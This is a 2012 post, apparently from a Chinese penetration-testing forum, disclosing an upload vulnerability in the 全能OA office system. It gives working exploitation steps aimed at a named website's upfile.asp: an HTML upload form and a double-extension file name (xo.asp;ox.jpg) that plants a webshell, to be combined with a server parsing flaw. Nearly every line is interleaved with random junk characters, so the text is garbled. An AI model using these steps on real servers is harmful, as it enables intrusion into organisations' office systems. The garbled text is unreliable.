中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞& S* o4 l7 ^" Q+ j  l! b+ |
( u5 y7 Y3 W* g/ k
系统介绍:, X" `( J! n' m  v0 i
& C: _5 j- u6 ]" o+ C& U' f
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
8 s$ d+ @$ F# q4 s- v# z$ a
6 i( v7 H, T5 N+ g主要功能:
6 |- a- ~. K) E# x2 q, Z4 D2 G$ O公司通告
. K, V+ o. e) T- Z% z工作计划 & y, _9 e  a2 v
通讯助理
8 K. c" _7 e6 i- z0 B( w7 d0 R客户资源 ) T% d- }% s+ _% M+ W. n
我的公文 + b; D' M7 ~; D, B
公文传阅 / y$ S1 t& A- e* y- }
公共资源 / k: a  j" L9 [1 J5 N, j
资源预约 ! z$ W3 S! m' h+ U- V
今日考勤
$ J# g$ x: t  X, B0 S: G个人计划 0 u4 v& ], O9 j  B: @' F+ X& y
个人通讯录 1 K2 f% _+ q2 E$ R8 |
个人基本档案 * g4 p9 K8 e  r2 i
未读邮件
4 X- u/ v% p0 m! ?发邮件
  X) N! B6 V# u6 e( F& G收件夹 . m' a$ \$ C9 ?: f0 H& O. Y7 P9 K
寄件夹
# W! [  z- j: V. `# e网络硬盘
3 ?/ i; r3 S5 \! l' G网络会议 8 y9 w& |7 T6 T0 q* _
网络调查
6 l# Q$ h5 \3 n1 H9 k2 o交流论坛; {" u& C% m, u9 f* b  M, v
$ y3 d" v* C3 X; l
有兴趣测试的朋友可以下源码看看" X" L; t8 j7 @' U* C5 |) ]9 v
  X3 Q7 n* X. z7 K% j5 i( b
源码下载:8 i7 q( S3 J( q, p! ]
& M2 c' B  J; m% U/ Q# }
http://www.mycodes.net/30/4750.htm
: v3 k  e" T( B
! r% y4 n, W" v- l  a漏洞介绍:* w/ g" r  p; S7 S  d0 W
6 o1 H7 }4 J) N% `- P& o3 s
由upfile.asp上传文件漏洞引起
. a2 Y$ k  Q8 B3 t! t8 c6 v* u% g9 q  m. |
测试方法:+ M+ ~' h  c! s( x# G% w, n% N

* n# z* l$ F. p2 Z$ p使用名小子上传http://www.itlynn.com/upfile.asp即可
6 L0 X4 ^% B7 p3 u; T9 ?4 j* M) z* x1 o4 j# [7 A
如果upfile.asp文件被删除不存在。8 \6 c4 c+ u0 D4 F

$ h+ D, D, w6 r. P0 J- E  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp! n& N6 `* c! w" {$ Y4 l* {
  \8 e; U1 w. ]4 @; Q
如果存在那么将如下代码保存为upfile.html。
; W( [- c0 s# e: H& L" O4 `- ^3 o
3 H% y* b) Y. J* j  A- x然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp6 ^* I( R: m) Z& i) A- I8 c; K

5 ?8 q/ m* w* a3 `4 V 2 V; t5 S8 x+ d( n2 f
& d% s1 F1 N2 h. }5 W
01 <table border='0' align="center" cellpadding="5"> * i- d( F) V; |0 z% P

( S1 ?* @% \# \, T02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
" R5 Z3 `( @8 n. A2 P# L
0 d6 K% F; R+ F' w4 ~% T- \8 }03 <tr>
  W3 m% r% f: |1 U) k  X$ @+ d) [; v' V2 h6 x
04             <td>报错:</td> : R  N& r6 C+ y3 r$ M8 c
# Q" O& Y3 Q0 `
05             <td><input type='radio' name='errnumber' value='0'> 9 T+ _/ y* B3 t: S8 _) I

  W4 v5 \+ S. h2 m3 @& c/ l  i7 ]06               自动更名
6 ^+ I7 P# j# M8 w0 c
" h3 L, R# ^$ h# M" K$ F0 }" Z07               <input type='radio' name='errnumber' value='1' checked>
, \$ x3 m- n5 N  n5 X
* I; p: O/ N$ `) k% }: j) ?9 _08               报错方式
1 k+ U1 X% _% o  f4 h. g5 H" I* B- Z- u1 [+ e
09               <input type='radio' name='errnumber' value='2'> 9 @  _& |1 [! {+ G1 W

6 {  {# C+ Q8 L; T7 \10               直接覆盖</td>
# c( W' E0 j: n" S& M0 R+ Z
8 m2 r. i; E1 O7 r6 p, X11           </tr> 4 M4 {  n' d/ E# e. h

" ]0 L3 u+ t* R3 Y0 h12           <tr>
; q# b$ \" B% J# t! C; Y/ A, @. V- u: M8 L4 Q# M; U
13             <td>主题:</td>
& o- h' I( }  a; a3 _, f- x4 z& z8 u8 I
14             <td><input type='text' name='filename' size='30'></td>
/ }+ P6 K1 m6 [( Y: g
5 n4 D/ y' x* b' p* k% F5 @* `15           </tr>
: Q) D# H+ U7 B) \
  w7 ^# ~6 J9 _, P& f2 q6 ^6 \; w16           <tr> 0 w9 e% g+ D" ?, T, l& ], z% u1 x

; v( o7 |1 `6 N. \17             <td>文件:</td> % S1 V' H, }  V4 o+ a5 t3 ]

/ b' J7 g: ^+ N# P5 {; M18             <td><input type="file"name="fruit"size="30"></td>
2 ~  F  f$ C$ Z- T1 t8 l8 o* v+ N* A( x
19           </tr>
: u& s. r1 D2 p- S; d! P2 h3 y# B5 v4 R; |, j
20           <tr>
' Y9 K0 Z3 H, @2 N
: N+ G  \2 X" D4 g! u& P21             <td valign='top'>简介:</td>
+ O8 u+ K* U2 w/ A+ r/ H0 v6 j3 L: V* W  e7 V0 r  e( V; I
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 2 L7 E  z6 h; B7 i6 [4 O. X

, W! I( X6 B. k3 l23           </tr>
! o) v6 J0 o* m0 V0 p( E( k3 `' j" A! P! |. \+ M1 M
24   $ Z9 F  i, s& A! h4 s% i) ]3 T
6 A& B5 @* F2 L
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
& f# [% Y# m. g  \8 g& s
" q8 d# F" R9 W) e0 b1 Y0 \/ D26           </tr>
1 Q8 ?( A( N' m% }- u! _0 ]& C. N' x0 F+ Q- }% f8 {
27         </form>
. J& w+ D: O1 {% c9 k) z2 _1 N# k: l4 n& f' A; R2 Z! t
然后打开上传一个文件名为xo.asp;ox.jpg的文件。/ _+ Y3 d# z) C: j7 ]/ ]
! ~( z$ d" D1 H7 m* k, z

% K7 Y6 J% H1 ^5 |
  B5 c- B( o0 L: z# g3 M& a% h1 W上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg4 G9 g# q8 S1 A: I  T, f$ n, E

# Q' P' \: q' K5 Y2 F此漏洞需要配合解析漏洞利用。
- M2 A: F: A  Q& ~1 s4 ]* B4 u6 A& F4 T8 B3 b# a+ \: [2 C





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2